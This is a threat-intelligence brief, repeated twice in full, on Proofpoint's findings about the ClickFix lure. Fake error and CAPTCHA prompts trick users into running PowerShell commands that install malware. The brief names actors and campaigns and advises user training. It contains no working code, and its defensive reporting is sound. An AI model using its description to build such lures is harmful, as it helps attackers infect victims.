Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape
Summary:
Proofpoint has observed a significant rise in the use of the ClickFix social engineering technique, a deceptive method that tricks users into executing malicious PowerShell commands. Initially linked to campaigns by TA571 and the ClearFake threat cluster, the technique has now become a favorite across multiple financially motivated and espionage-focused threat actors. ClickFix typically works by presenting users with fake error messages or CAPTCHA prompts that appear legitimate, encouraging them to manually copy and execute PowerShell commands to resolve fabricated issues. Once executed, these commands download and deploy various malware strains, including AsyncRAT, Lumma Stealer, NetSupport RAT, and more.
Threat actors have leveraged the technique across a wide range of impersonations, targeting trusted brands, as well as software specific to industries like transportation and logistics. Delivery methods for these campaigns include phishing emails, compromised websites, malicious URLs, HTML attachments, and fake CAPTCHA dialogs. Notable campaigns include GitHub phishing lures impersonating security notifications, German-language attacks targeting Swiss organizations with fake e-commerce notifications, and ChatGPT-themed malvertising that led to XWorm infections. A separate campaign attributed to suspected espionage group UAC-0050 targeted Ukrainian organizations with phishing emails disguised as document requests, utilizing a reCAPTCHA phish to deliver malware suspected to be Lucky Volunteer.
Analyst Comments:
Recent innovations have made ClickFix even more insidious. For example, some campaigns use fake CAPTCHA prompts to validate users with "Verify You Are Human" messages, hiding malicious PowerShell commands within these instructions. One such tool, the open-source reCAPTCHA Phish toolkit, was released in September 2024 and almost immediately adopted by threat actors. Additionally, some campaigns feature advanced evasion tactics, such as reversing strings in HTML files or embedding obfuscated JavaScript with comments generated by language models. Although much of the activity remains unattributed, financially motivated actors dominate the use of this technique, with notable instances of espionage-focused campaigns. The popularity of ClickFix lies in its ability to exploit human behavior. By preying on users’ desire to resolve issues independently, adversaries bypass traditional security measures and encourage victims to unknowingly infect their own systems. This shift to psychological manipulation reflects an evolution in adversarial tactics as traditional methods like macros lose effectiveness.
Suggested Corrections:
Given the growing adoption of ClickFix across the threat landscape, organizations must prioritize user education. Training programs should focus on teaching users to recognize ClickFix tactics, such as fake error messages, manual PowerShell instructions, and CAPTCHA lures. Users should also be encouraged to report suspicious activity to IT teams instead of attempting to resolve issues on their own. Understanding and addressing this emerging threat will help organizations build stronger defenses against increasingly sophisticated social engineering attacks.
Link(s):
https://www.proofpoint.com/us/blog/...engineering-technique-floods-threat-landscape
Proofpoint has observed a significant rise in the use of the ClickFix social engineering technique, a deceptive method that tricks users into executing malicious PowerShell commands. Initially linked to campaigns by TA571 and the ClearFake threat cluster, the technique has now become a favorite across multiple financially motivated and espionage-focused threat actors. ClickFix typically works by presenting users with fake error messages or CAPTCHA prompts that appear legitimate, encouraging them to manually copy and execute PowerShell commands to resolve fabricated issues. Once executed, these commands download and deploy various malware strains, including AsyncRAT, Lumma Stealer, NetSupport RAT, and more.
Threat actors have leveraged the technique across a wide range of impersonations, targeting trusted brands, as well as software specific to industries like transportation and logistics. Delivery methods for these campaigns include phishing emails, compromised websites, malicious URLs, HTML attachments, and fake CAPTCHA dialogs. Notable campaigns include GitHub phishing lures impersonating security notifications, German-language attacks targeting Swiss organizations with fake e-commerce notifications, and ChatGPT-themed malvertising that led to XWorm infections. A separate campaign attributed to suspected espionage group UAC-0050 targeted Ukrainian organizations with phishing emails disguised as document requests, utilizing a reCAPTCHA phish to deliver malware suspected to be Lucky Volunteer.
Analyst Comments:
Recent innovations have made ClickFix even more insidious. For example, some campaigns use fake CAPTCHA prompts to validate users with "Verify You Are Human" messages, hiding malicious PowerShell commands within these instructions. One such tool, the open-source reCAPTCHA Phish toolkit, was released in September 2024 and almost immediately adopted by threat actors. Additionally, some campaigns feature advanced evasion tactics, such as reversing strings in HTML files or embedding obfuscated JavaScript with comments generated by language models. Although much of the activity remains unattributed, financially motivated actors dominate the use of this technique, with notable instances of espionage-focused campaigns. The popularity of ClickFix lies in its ability to exploit human behavior. By preying on users’ desire to resolve issues independently, adversaries bypass traditional security measures and encourage victims to unknowingly infect their own systems. This shift to psychological manipulation reflects an evolution in adversarial tactics as traditional methods like macros lose effectiveness.
Suggested Corrections:
Given the growing adoption of ClickFix across the threat landscape, organizations must prioritize user education. Training programs should focus on teaching users to recognize ClickFix tactics, such as fake error messages, manual PowerShell instructions, and CAPTCHA lures. Users should also be encouraged to report suspicious activity to IT teams instead of attempting to resolve issues on their own. Understanding and addressing this emerging threat will help organizations build stronger defenses against increasingly sophisticated social engineering attacks.
Link(s):
https://www.proofpoint.com/us/blog/...engineering-technique-floods-threat-landscape